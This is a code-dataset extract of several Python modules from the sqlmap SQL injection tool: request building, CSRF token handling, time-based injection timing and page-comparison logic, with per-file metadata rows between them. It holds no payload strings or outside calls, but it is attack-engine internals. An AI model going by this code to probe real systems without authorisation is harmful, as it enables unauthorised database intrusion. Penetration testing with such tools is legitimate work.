(DEFAULT_GET_POST_DELIMITER, match.group("name"))) value = agent.replacePayload(value, payload) else: warnMsg = "HTTP parameter pollution works only with regular " warnMsg += "GET and POST parameters" singleTimeWarnMessage(warnMsg) if place: value = agent.removePayloadDelimiters(value) if PLACE.GET in conf.parameters: get = conf.parameters[PLACE.GET] if place != PLACE.GET or not value else value if PLACE.POST in conf.parameters: post = conf.parameters[PLACE.POST] if place != PLACE.POST or not value else value if PLACE.CUSTOM_POST in conf.parameters: post = conf.parameters[PLACE.CUSTOM_POST].replace(CUSTOM_INJECTION_MARK_CHAR, "") if place != PLACE.CUSTOM_POST or not value else value post = post.replace(ASTERISK_MARKER, '*') if post else post if PLACE.COOKIE in conf.parameters: cookie = conf.parameters[PLACE.COOKIE] if place != PLACE.COOKIE or not value else value if PLACE.USER_AGENT in conf.parameters: ua = conf.parameters[PLACE.USER_AGENT] if place != PLACE.USER_AGENT or not value else value if PLACE.REFERER in conf.parameters: referer = conf.parameters[PLACE.REFERER] if place != PLACE.REFERER or not value else value if PLACE.HOST in conf.parameters: host = conf.parameters[PLACE.HOST] if place != PLACE.HOST or not value else value if PLACE.URI in conf.parameters: uri = conf.url if place != PLACE.URI or not value else value else: uri = conf.url if value and place == PLACE.CUSTOM_HEADER: auxHeaders[value.split(',')[0]] = value.split(',', 1)[1] if conf.csrfToken: def _adjustParameter(paramString, parameter, newValue): retVal = paramString match = re.search("%s=(?P<value>[^&]*)" % re.escape(parameter), paramString) if match: origValue = match.group("value") retVal = re.sub("%s=[^&]*" % re.escape(parameter), "%s=%s" % (parameter, newValue), paramString) return retVal page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST)) match = re.search(r"<input[^>]+name=[\"']?%s[\"']?\s[^>]*value=(\"([^\"]+)|'([^']+)|([^ >]+))" % re.escape(conf.csrfToken), page or "") token = (match.group(2) or match.group(3) or match.group(4)) if match else None if not token: if conf.csrfUrl != conf.url and code == httplib.OK: if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""): token = page if not token and any(_.name == conf.csrfToken for _ in conf.cj): for _ in conf.cj: if _.name == conf.csrfToken: token = _.value if not any (conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))): if post: post = "%s%s%s=%s" % (post, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token) elif get: get = "%s%s%s=%s" % (get, conf.paramDel or DEFAULT_GET_POST_DELIMITER, conf.csrfToken, token) else: get = "%s=%s" % (conf.csrfToken, token) break if not token: errMsg = "CSRF protection token '%s' can't be found at '%s'" % (conf.csrfToken, conf.csrfUrl or conf.url) if not conf.csrfUrl: errMsg += ". You can try to rerun by providing " errMsg += "a valid value for option '--csrf-url'" raise SqlmapTokenException, errMsg if token: for place in (PLACE.GET, PLACE.POST): if place in conf.parameters: if place == PLACE.GET and get: get = _adjustParameter(get, conf.csrfToken, token) elif place == PLACE.POST and post: post = _adjustParameter(post, conf.csrfToken, token) for i in xrange(len(conf.httpHeaders)): if conf.httpHeaders[i][0].lower() == conf.csrfToken.lower(): conf.httpHeaders[i] = (conf.httpHeaders[i][0], token) if conf.rParam: def _randomizeParameter(paramString, randomParameter): retVal = paramString match = re.search("%s=(?P<value>[^&;]+)" % re.escape(randomParameter), paramString) if match: origValue = match.group("value") retVal = re.sub("%s=[^&;]+" % re.escape(randomParameter), "%s=%s" % (randomParameter, randomizeParameterValue(origValue)), paramString) return retVal for randomParameter in conf.rParam: for item in (PLACE.GET, PLACE.POST, PLACE.COOKIE): if item in conf.parameters: if item == PLACE.GET and get: get = _randomizeParameter(get, randomParameter) elif item == PLACE.POST and post: post = _randomizeParameter(post, randomParameter) elif item == PLACE.COOKIE and cookie: cookie = _randomizeParameter(cookie, randomParameter) if conf.evalCode: delimiter = conf.paramDel or DEFAULT_GET_POST_DELIMITER variables = {"uri": uri} originals = {} for item in filter(None, (get, post if not kb.postHint else None)): for part in item.split(delimiter): if '=' in part: name, value = part.split('=', 1) value = urldecode(value, convall=True, plusspace=(item==post and kb.postSpaceToPlus)) evaluateCode("%s=%s" % (name.strip(), repr(value)), variables) if cookie: for part in cookie.split(conf.cookieDel or DEFAULT_COOKIE_DELIMITER): if '=' in part: name, value = part.split('=', 1) value = urldecode(value, convall=True) evaluateCode("%s=%s" % (name.strip(), repr(value)), variables) originals.update(variables) evaluateCode(conf.evalCode, variables) uri = variables["uri"] for name, value in variables.items(): if name != "__builtins__" and originals.get(name, "") != value: if isinstance(value, (basestring, int)): found = False value = unicode(value) regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(delimiter), re.escape(name), re.escape(delimiter)) if re.search(regex, (get or "")): found = True get = re.sub(regex, "\g<1>%s\g<3>" % value, get) if re.search(regex, (post or "")): found = True post = re.sub(regex, "\g<1>%s\g<3>" % value, post) regex = r"((\A|%s)%s=).+?(%s|\Z)" % (re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER), name, re.escape(conf.cookieDel or DEFAULT_COOKIE_DELIMITER)) if re.search(regex, (cookie or "")): found = True cookie = re.sub(regex, "\g<1>%s\g<3>" % value, cookie) if not found: if post is not None: post += "%s%s=%s" % (delimiter, name, value) elif get is not None: get += "%s%s=%s" % (delimiter, name, value) elif cookie is not None: cookie += "%s%s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, name, value) if not conf.skipUrlEncode: get = urlencode(get, limit=True) if post is not None: if place not in (PLACE.POST, PLACE.CUSTOM_POST) and hasattr(post, UNENCODED_ORIGINAL_VALUE): post = getattr(post, UNENCODED_ORIGINAL_VALUE) elif kb.postUrlEncode: post = urlencode(post, spaceplus=kb.postSpaceToPlus) if timeBasedCompare: if len(kb.responseTimes) < MIN_TIME_RESPONSES: clearConsoleLine() if conf.tor: warnMsg = "it's highly recommended to avoid usage of switch '--tor' for " warnMsg += "time-based injections because of its high latency time" singleTimeWarnMessage(warnMsg) warnMsg = "[%s] [WARNING] time-based comparison requires " % time.strftime("%X") warnMsg += "larger statistical model, please wait" dataToStdout(warnMsg) while len(kb.responseTimes) < MIN_TIME_RESPONSES: Connect.queryPage(content=True) dataToStdout('.') dataToStdout("\n") elif not kb.testMode: warnMsg = "it is very important not to stress the network adapter " warnMsg += "during usage of time-based payloads to prevent potential " warnMsg += "errors " singleTimeWarnMessage(warnMsg) if not kb.laggingChecked: kb.laggingChecked = True deviation = stdev(kb.responseTimes) if deviation > WARN_TIME_STDEV: kb.adjustTimeDelay = ADJUST_TIME_DELAY.DISABLE warnMsg = "considerable lagging has been detected " warnMsg += "in connection response(s). Please use as high " warnMsg += "value for option '--time-sec' as possible (e.g. " warnMsg += "10 or more)" logger.critical(warnMsg) if conf.safUrl and conf.saFreq > 0: kb.queryCounter += 1 if kb.queryCounter % conf.saFreq == 0: Connect.getPage(url=conf.safUrl, cookie=cookie, direct=True, silent=True, ua=ua, referer=referer, host=host) start = time.time() if kb.nullConnection and not content and not response and not timeBasedCompare: noteResponseTime = False pushValue(kb.pageCompress) kb.pageCompress = False if kb.nullConnection == NULLCONNECTION.HEAD: method = HTTPMETHOD.HEAD elif kb.nullConnection == NULLCONNECTION.RANGE: auxHeaders[HTTP_HEADER.RANGE] = "bytes=-1" _, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ)) if headers: if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and HTTP_HEADER.CONTENT_LENGTH in headers: pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH]) elif kb.nullConnection == NULLCONNECTION.RANGE and HTTP_HEADER.CONTENT_RANGE in headers: pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:]) kb.pageCompress = popValue() if not pageLength: try: page, headers, code = Connect.getPage(url=uri, get=get, post=post, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, method=method, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) except MemoryError: page, headers, code = None, None, None warnMsg = "site returned insanely large response" if kb.testMode: warnMsg += " in testing phase. This is a common " warnMsg += "behavior in custom WAF/IDS/IPS solutions" singleTimeWarnMessage(warnMsg) if conf.secondOrder: page, headers, code = Connect.getPage(url=conf.secondOrder, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) threadData.lastQueryDuration = calculateDeltaSeconds(start) kb.originalCode = kb.originalCode or code if kb.testMode: kb.testQueryCount += 1 if timeBasedCompare: return wasLastResponseDelayed() elif noteResponseTime: kb.responseTimes.append(threadData.lastQueryDuration) if not response and removeReflection: page = removeReflectiveValues(page, payload) kb.maxConnectionsFlag = re.search(MAX_CONNECTIONS_REGEX, page or "", re.I) is not None kb.permissionFlag = re.search(PERMISSION_DENIED_REGEX, page or "", re.I) is not None if content or response: return page, headers if getRatioValue: return comparison(page, headers, code, getRatioValue=False, pageLength=pageLength), comparison(page, headers, code, getRatioValue=True, pageLength=pageLength) else: return comparison(page, headers, code, getRatioValue, pageLength) def setHTTPProxy(): # Cross-linked function raise NotImplementedError
46,892
Python
.py
818
42.743276
271
0.581205
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,951
direct.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/request/direct.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import time from extra.safe2bin.safe2bin import safecharencode from lib.core.agent import agent from lib.core.common import Backend from lib.core.common import calculateDeltaSeconds from lib.core.common import extractExpectedValue from lib.core.common import getCurrentThreadData from lib.core.common import getUnicode from lib.core.common import hashDBRetrieve from lib.core.common import hashDBWrite from lib.core.common import isListLike from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.dicts import SQL_STATEMENTS from lib.core.enums import CUSTOM_LOGGING from lib.core.enums import DBMS from lib.core.enums import EXPECTED from lib.core.settings import UNICODE_ENCODING from lib.utils.timeout import timeout def direct(query, content=True): select = True query = agent.payloadDirect(query) query = agent.adjustLateValues(query) threadData = getCurrentThreadData() if Backend.isDbms(DBMS.ORACLE) and query.upper().startswith("SELECT ") and " FROM " not in query.upper(): query = "%s FROM DUAL" % query for sqlTitle, sqlStatements in SQL_STATEMENTS.items(): for sqlStatement in sqlStatements: if query.lower().startswith(sqlStatement) and sqlTitle != "SQL SELECT statement": select = False break if select and not query.upper().startswith("SELECT "): query = "SELECT %s" % query logger.log(CUSTOM_LOGGING.PAYLOAD, query) output = hashDBRetrieve(query, True, True) start = time.time() if not select and "EXEC " not in query.upper(): _ = timeout(func=conf.dbmsConnector.execute, args=(query,), duration=conf.timeout, default=None) elif not (output and "sqlmapoutput" not in query and "sqlmapfile" not in query): output = timeout(func=conf.dbmsConnector.select, args=(query,), duration=conf.timeout, default=None) hashDBWrite(query, output, True) elif output: infoMsg = "resumed: %s..." % getUnicode(output, UNICODE_ENCODING)[:20] logger.info(infoMsg) threadData.lastQueryDuration = calculateDeltaSeconds(start) if not output: return output elif content: if output and isListLike(output): if len(output[0]) == 1: output = [_[0] for _ in output] retVal = getUnicode(output, noneToNull=True) return safecharencode(retVal) if kb.safeCharEncode else retVal else: return extractExpectedValue(output, EXPECTED.BOOL)
2,667
Python
.py
61
38.52459
109
0.730146
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,952
basic.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/request/basic.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import codecs import gzip import logging import re import StringIO import struct import zlib from lib.core.common import extractErrorMessage from lib.core.common import extractRegexResult from lib.core.common import getPublicTypeMembers from lib.core.common import getUnicode from lib.core.common import readInput from lib.core.common import resetCookieJar from lib.core.common import singleTimeLogMessage from lib.core.common import singleTimeWarnMessage from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.enums import HTTP_HEADER from lib.core.enums import PLACE from lib.core.exception import SqlmapCompressionException from lib.core.settings import DEFAULT_COOKIE_DELIMITER from lib.core.settings import EVENTVALIDATION_REGEX from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE from lib.core.settings import ML from lib.core.settings import META_CHARSET_REGEX from lib.core.settings import PARSE_HEADERS_LIMIT from lib.core.settings import VIEWSTATE_REGEX from lib.parse.headers import headersParser from lib.parse.html import htmlParser from lib.utils.htmlentities import htmlEntities from thirdparty.chardet import detect from thirdparty.odict.odict import OrderedDict def forgeHeaders(items=None): """ Prepare HTTP Cookie, HTTP User-Agent and HTTP Referer headers to use when performing the HTTP requests """ items = items or {} for _ in items.keys(): if items[_] is None: del items[_] headers = OrderedDict(conf.httpHeaders) headers.update(items.items()) class _str(str): def capitalize(self): return _str(self) def title(self): return _str(self) _ = headers headers = OrderedDict() for key, value in _.items(): success = False if key.upper() not in (_.upper() for _ in getPublicTypeMembers(HTTP_HEADER, True)): try: headers[_str(key)] = value # dirty hack for http://bugs.python.org/issue12455 except UnicodeEncodeError: # don't do the hack on non-ASCII header names (they have to be properly encoded later on) pass else: success = True if not success: key = '-'.join(_.capitalize() for _ in key.split('-')) headers[key] = value if conf.cj: if HTTP_HEADER.COOKIE in headers: for cookie in conf.cj: if cookie.domain_specified and not conf.hostname.endswith(cookie.domain): continue if ("%s=" % cookie.name) in headers[HTTP_HEADER.COOKIE]: if conf.loadCookies: conf.httpHeaders = filter(None, ((item if item[0] != HTTP_HEADER.COOKIE else None) for item in conf.httpHeaders)) elif kb.mergeCookies is None: message = "you provided a HTTP %s header value. " % HTTP_HEADER.COOKIE message += "The target URL provided its own cookies within " message += "the HTTP %s header which intersect with yours. " % HTTP_HEADER.SET_COOKIE message += "Do you want to merge them in futher requests? [Y/n] " _ = readInput(message, default="Y") kb.mergeCookies = not _ or _[0] in ("y", "Y") if kb.mergeCookies: _ = lambda x: re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(cookie.name), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), "%s=%s" % (cookie.name, getUnicode(cookie.value)), x) headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE]) if PLACE.COOKIE in conf.parameters: conf.parameters[PLACE.COOKIE] = _(conf.parameters[PLACE.COOKIE]) conf.httpHeaders = [(item[0], item[1] if item[0] != HTTP_HEADER.COOKIE else _(item[1])) for item in conf.httpHeaders] elif not kb.testMode: headers[HTTP_HEADER.COOKIE] += "%s %s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, cookie.name, getUnicode(cookie.value)) if kb.testMode and not conf.csrfToken: resetCookieJar(conf.cj) return headers def parseResponse(page, headers): """ @param page: the page to parse to feed the knowledge base htmlFp (back-end DBMS fingerprint based upon DBMS error messages return through the web application) list and absFilePaths (absolute file paths) set. """ if headers: headersParser(headers) if page: htmlParser(page) def checkCharEncoding(encoding, warn=True): """ Checks encoding name, repairs common misspellings and adjusts to proper namings used in codecs module >>> checkCharEncoding('iso-8858', False) 'iso8859-1' >>> checkCharEncoding('en_us', False) 'utf8' """ if encoding: encoding = encoding.lower() else: return encoding # Reference: http://www.destructor.de/charsets/index.htm translate = {"windows-874": "iso-8859-11", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk"} for delimiter in (';', ',', '('): if delimiter in encoding: encoding = encoding[:encoding.find(delimiter)].strip() # popular typos/errors if "8858" in encoding: encoding = encoding.replace("8858", "8859") # iso-8858 -> iso-8859 elif "8559" in encoding: encoding = encoding.replace("8559", "8859") # iso-8559 -> iso-8859 elif "5889" in encoding: encoding = encoding.replace("5889", "8859") # iso-5889 -> iso-8859 elif "5589" in encoding: encoding = encoding.replace("5589", "8859") # iso-5589 -> iso-8859 elif "2313" in encoding: encoding = encoding.replace("2313", "2312") # gb2313 -> gb2312 elif encoding.startswith("x-"): encoding = encoding[len("x-"):] # x-euc-kr -> euc-kr / x-mac-turkish -> mac-turkish elif "windows-cp" in encoding: encoding = encoding.replace("windows-cp", "windows") # windows-cp-1254 -> windows-1254 # name adjustment for compatibility if encoding.startswith("8859"): encoding = "iso-%s" % encoding elif encoding.startswith("cp-"): encoding = "cp%s" % encoding[3:] elif encoding.startswith("euc-"): encoding = "euc_%s" % encoding[4:] elif encoding.startswith("windows") and not encoding.startswith("windows-"): encoding = "windows-%s" % encoding[7:] elif encoding.find("iso-88") > 0: encoding = encoding[encoding.find("iso-88"):] elif encoding.startswith("is0-"): encoding = "iso%s" % encoding[4:] elif encoding.find("ascii") > 0: encoding = "ascii" elif encoding.find("utf8") > 0: encoding = "utf8" # Reference: http://philip.html5.org/data/charsets-2.html if encoding in translate: encoding = translate[encoding] elif encoding in ("null", "{charset}", "*"): return None # Reference: http://www.iana.org/assignments/character-sets # Reference: http://docs.python.org/library/codecs.html try: codecs.lookup(encoding) except LookupError: if warn: warnMsg = "unknown web page charset '%s'. " % encoding warnMsg += "Please report by e-mail to %s." % ML singleTimeLogMessage(warnMsg, logging.WARN, encoding) encoding = None return encoding def getHeuristicCharEncoding(page): """ Returns page encoding charset detected by usage of heuristics Reference: http://chardet.feedparser.org/docs/ """ retVal = detect(page)["encoding"] if retVal: infoMsg = "heuristics detected web page charset '%s'" % retVal singleTimeLogMessage(infoMsg, logging.INFO, retVal) return retVal def decodePage(page, contentEncoding, contentType): """ Decode compressed/charset HTTP response """ if not page or (conf.nullConnection and len(page) < 2): return getUnicode(page) if isinstance(contentEncoding, basestring) and contentEncoding.lower() in ("gzip", "x-gzip", "deflate"): if not kb.pageCompress: return None try: if contentEncoding.lower() == "deflate": data = StringIO.StringIO(zlib.decompress(page, -15)) # Reference: http://stackoverflow.com/questions/1089662/python-inflate-and-deflate-implementations else: data = gzip.GzipFile("", "rb", 9, StringIO.StringIO(page)) size = struct.unpack("<l", page[-4:])[0] # Reference: http://pydoc.org/get.cgi/usr/local/lib/python2.5/gzip.py if size > MAX_CONNECTION_TOTAL_SIZE: raise Exception("size too large") page = data.read() except Exception, msg: errMsg = "detected invalid data for declared content " errMsg += "encoding '%s' ('%s')" % (contentEncoding, msg) singleTimeLogMessage(errMsg, logging.ERROR) warnMsg = "turning off page compression" singleTimeWarnMessage(warnMsg) kb.pageCompress = False raise SqlmapCompressionException if not conf.charset: httpCharset, metaCharset = None, None # Reference: http://stackoverflow.com/questions/1020892/python-urllib2-read-to-unicode if contentType and (contentType.find("charset=") != -1): httpCharset = checkCharEncoding(contentType.split("charset=")[-1]) metaCharset = checkCharEncoding(extractRegexResult(META_CHARSET_REGEX, page)) if (any((httpCharset, metaCharset)) and not all((httpCharset, metaCharset)))\ or (httpCharset == metaCharset and all((httpCharset, metaCharset))): kb.pageEncoding = httpCharset or metaCharset debugMsg = "declared web page charset '%s'" % kb.pageEncoding singleTimeLogMessage(debugMsg, logging.DEBUG, debugMsg) else: kb.pageEncoding = None else: kb.pageEncoding = conf.charset # can't do for all responses because we need to support binary files too if contentType and not isinstance(page, unicode) and "text/" in contentType.lower(): # e.g. &#195;&#235;&#224;&#226;&#224; if "&#" in page: page = re.sub(r"&#(\d{1,3});", lambda _: chr(int(_.group(1))) if int(_.group(1)) < 256 else _.group(0), page) # e.g. %20%28%29 if "%" in page: page = re.sub(r"%([0-9a-fA-F]{2})", lambda _: _.group(1).decode("hex"), page) # e.g. &amp; page = re.sub(r"&([^;]+);", lambda _: chr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 256) < 256 else _.group(0), page) kb.pageEncoding = kb.pageEncoding or checkCharEncoding(getHeuristicCharEncoding(page)) page = getUnicode(page, kb.pageEncoding) # e.g. &#8217;&#8230;&#8482; if "&#" in page: def _(match): retVal = match.group(0) try: retVal = unichr(int(match.group(1))) except ValueError: pass return retVal page = re.sub(r"&#(\d+);", _, page) # e.g. &zeta; page = re.sub(r"&([^;]+);", lambda _: unichr(htmlEntities[_.group(1)]) if htmlEntities.get(_.group(1), 0) > 255 else _.group(0), page) return page def processResponse(page, responseHeaders): kb.processResponseCounter += 1 parseResponse(page, responseHeaders if kb.processResponseCounter < PARSE_HEADERS_LIMIT else None) if conf.parseErrors: msg = extractErrorMessage(page) if msg: logger.warning("parsed DBMS error message: '%s'" % msg) if kb.originalPage is None: for regex in (EVENTVALIDATION_REGEX, VIEWSTATE_REGEX): match = re.search(regex, page) if match and PLACE.POST in conf.parameters: name, value = match.groups() if PLACE.POST in conf.paramDict and name in conf.paramDict[PLACE.POST]: if conf.paramDict[PLACE.POST][name] in page: continue conf.paramDict[PLACE.POST][name] = value conf.parameters[PLACE.POST] = re.sub("(?i)(%s=)[^&]+" % name, r"\g<1>%s" % value, conf.parameters[PLACE.POST])
12,679
Python
.py
264
39.022727
250
0.628257
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,953
rangehandler.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/request/rangehandler.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import urllib import urllib2 from lib.core.exception import SqlmapConnectionException class HTTPRangeHandler(urllib2.BaseHandler): """ Handler that enables HTTP Range headers. Reference: http://stackoverflow.com/questions/1971240/python-seek-on-remote-file This was extremely simple. The Range header is a HTTP feature to begin with so all this class does is tell urllib2 that the "206 Partial Content" response from the HTTP server is what we expected. Example: import urllib2 import byterange range_handler = range.HTTPRangeHandler() opener = urllib2.build_opener(range_handler) # install it urllib2.install_opener(opener) # create Request and set Range header req = urllib2.Request('http://www.python.org/') req.header['Range'] = 'bytes=30-50' f = urllib2.urlopen(req) """ def http_error_206(self, req, fp, code, msg, hdrs): # 206 Partial Content Response r = urllib.addinfourl(fp, hdrs, req.get_full_url()) r.code = code r.msg = msg return r def http_error_416(self, req, fp, code, msg, hdrs): # HTTP's Range Not Satisfiable error errMsg = "Invalid range" raise SqlmapConnectionException(errMsg)
1,443
Python
.py
38
31.710526
84
0.685571
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,954
httpshandler.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/request/httpshandler.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import httplib import socket import urllib2 from lib.core.data import logger from lib.core.exception import SqlmapConnectionException ssl = None try: import ssl as _ssl ssl = _ssl except ImportError: pass _protocols = [ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv23] class HTTPSConnection(httplib.HTTPSConnection): """ Connection class that enables usage of newer SSL protocols. Reference: http://bugs.python.org/msg128686 """ def __init__(self, *args, **kwargs): httplib.HTTPSConnection.__init__(self, *args, **kwargs) def connect(self): def create_sock(): sock = socket.create_connection((self.host, self.port), self.timeout) if getattr(self, "_tunnel_host", None): self.sock = sock self._tunnel() return sock success = False for protocol in _protocols: try: sock = create_sock() _ = ssl.wrap_socket(sock, self.key_file, self.cert_file, ssl_version=protocol) if _: success = True self.sock = _ _protocols.remove(protocol) _protocols.insert(0, protocol) break else: sock.close() except ssl.SSLError, errMsg: logger.debug("SSL connection error occurred ('%s')" % errMsg) if not success: raise SqlmapConnectionException("can't establish SSL connection") class HTTPSHandler(urllib2.HTTPSHandler): def https_open(self, req): return self.do_open(HTTPSConnection if ssl else httplib.HTTPSConnection, req) # Bug fix (http://bugs.python.org/issue17849) def _(self, *args): return self._readline() httplib.LineAndFileWrapper._readline = httplib.LineAndFileWrapper.readline httplib.LineAndFileWrapper.readline = _
2,073
Python
.py
56
28.660714
94
0.632184
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,955
comparison.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/request/comparison.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import re from lib.core.common import extractRegexResult from lib.core.common import getFilteredPageContent from lib.core.common import listToStrValue from lib.core.common import removeDynamicContent from lib.core.common import wasLastResponseDBMSError from lib.core.common import wasLastResponseHTTPError from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.exception import SqlmapNoneDataException from lib.core.settings import DEFAULT_PAGE_ENCODING from lib.core.settings import DIFF_TOLERANCE from lib.core.settings import HTML_TITLE_REGEX from lib.core.settings import MIN_RATIO from lib.core.settings import MAX_RATIO from lib.core.settings import REFLECTED_VALUE_MARKER from lib.core.settings import LOWER_RATIO_BOUND from lib.core.settings import UPPER_RATIO_BOUND from lib.core.threads import getCurrentThreadData def comparison(page, headers, code=None, getRatioValue=False, pageLength=None): _ = _adjust(_comparison(page, headers, code, getRatioValue, pageLength), getRatioValue) return _ def _adjust(condition, getRatioValue): if not any((conf.string, conf.notString, conf.regexp, conf.code)): # Negative logic approach is used in raw page comparison scheme as that what is "different" than original # PAYLOAD.WHERE.NEGATIVE response is considered as True; in switch based approach negative logic is not # applied as that what is by user considered as True is that what is returned by the comparison mechanism # itself retVal = not condition if kb.negativeLogic and condition is not None and not getRatioValue else condition else: retVal = condition if not getRatioValue else (MAX_RATIO if condition else MIN_RATIO) return retVal def _comparison(page, headers, code, getRatioValue, pageLength): threadData = getCurrentThreadData() if kb.testMode: threadData.lastComparisonHeaders = listToStrValue(headers.headers) if headers else "" threadData.lastComparisonPage = page if page is None and pageLength is None: return None seqMatcher = threadData.seqMatcher seqMatcher.set_seq1(kb.pageTemplate) if any((conf.string, conf.notString, conf.regexp)): rawResponse = "%s%s" % (listToStrValue(headers.headers) if headers else "", page) # String to match in page when the query is True and/or valid if conf.string: return conf.string in rawResponse # String to match in page when the query is False and/or invalid if conf.notString: return conf.notString not in rawResponse # Regular expression to match in page when the query is True and/or valid if conf.regexp: return re.search(conf.regexp, rawResponse, re.I | re.M) is not None # HTTP code to match when the query is valid if conf.code: return conf.code == code if page: # In case of an DBMS error page return None if kb.errorIsNone and (wasLastResponseDBMSError() or wasLastResponseHTTPError()): return None # Dynamic content lines to be excluded before comparison if not kb.nullConnection: page = removeDynamicContent(page) seqMatcher.set_seq1(removeDynamicContent(kb.pageTemplate)) if not pageLength: pageLength = len(page) if kb.nullConnection and pageLength: if not seqMatcher.a: errMsg = "problem occurred while retrieving original page content " errMsg += "which prevents sqlmap from continuation. Please rerun, " errMsg += "and if the problem persists turn off any optimization switches" raise SqlmapNoneDataException(errMsg) ratio = 1. * pageLength / len(seqMatcher.a) if ratio > 1.: ratio = 1. / ratio else: # Preventing "Unicode equal comparison failed to convert both arguments to Unicode" # (e.g. if one page is PDF and the other is HTML) if isinstance(seqMatcher.a, str) and isinstance(page, unicode): page = page.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, 'ignore') elif isinstance(seqMatcher.a, unicode) and isinstance(page, str): seqMatcher.a = seqMatcher.a.encode(kb.pageEncoding or DEFAULT_PAGE_ENCODING, 'ignore') seq1, seq2 = None, None if conf.titles: seq1 = extractRegexResult(HTML_TITLE_REGEX, seqMatcher.a) seq2 = extractRegexResult(HTML_TITLE_REGEX, page) else: seq1 = getFilteredPageContent(seqMatcher.a, True) if conf.textOnly else seqMatcher.a seq2 = getFilteredPageContent(page, True) if conf.textOnly else page if seq1 is None or seq2 is None: return None seq1 = seq1.replace(REFLECTED_VALUE_MARKER, "") seq2 = seq2.replace(REFLECTED_VALUE_MARKER, "") count = 0 while count < min(len(seq1), len(seq2)): if seq1[count] == seq2[count]: count += 1 else: break if count: seq1 = seq1[count:] seq2 = seq2[count:] seqMatcher.set_seq1(seq1) seqMatcher.set_seq2(seq2) ratio = round(seqMatcher.quick_ratio(), 3) # If the url is stable and we did not set yet the match ratio and the # current injected value changes the url page content if kb.matchRatio is None: if ratio >= LOWER_RATIO_BOUND and ratio <= UPPER_RATIO_BOUND: kb.matchRatio = ratio logger.debug("setting match ratio for current parameter to %.3f" % kb.matchRatio) # If it has been requested to return the ratio and not a comparison # response if getRatioValue: return ratio elif ratio > UPPER_RATIO_BOUND: return True elif kb.matchRatio is None: return None else: return (ratio - kb.matchRatio) > DIFF_TOLERANCE
6,090
Python
.py
126
40.722222
113
0.699039
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,956
basicauthhandler.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/request/basicauthhandler.py
